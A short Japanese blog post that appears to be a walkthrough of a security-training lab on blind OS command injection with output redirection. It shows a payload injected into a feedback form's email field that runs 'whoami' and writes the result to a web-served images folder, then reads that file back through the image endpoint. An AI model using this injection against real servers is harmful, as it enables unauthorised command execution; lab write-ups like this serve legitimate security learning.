academy OSコマンドインジェクション 3問目 出力リダイレクトによるブラインドOSコマンドインジェクション

OS COMMAND INJECTION

Lab: Blind OS command injection with output redirection

Submit feedbackをクリック

適当に入力して、submit feedbackボタン

POST /feedback/submit をリピータに

emailパラメータを
email=||whoami>/var/www/images/output.txt||
に変更、send

製品画像のリクエスト
GET /image?filename=x.jpg
をリピータに
(historyのfilterでimageにチェックいる)

filename=output.txt に書き換えて、send

レスポンスに、ユーザー名らしき文字が表示されてる
クリア!

–)v

コメント

タイトルとURLをコピーしました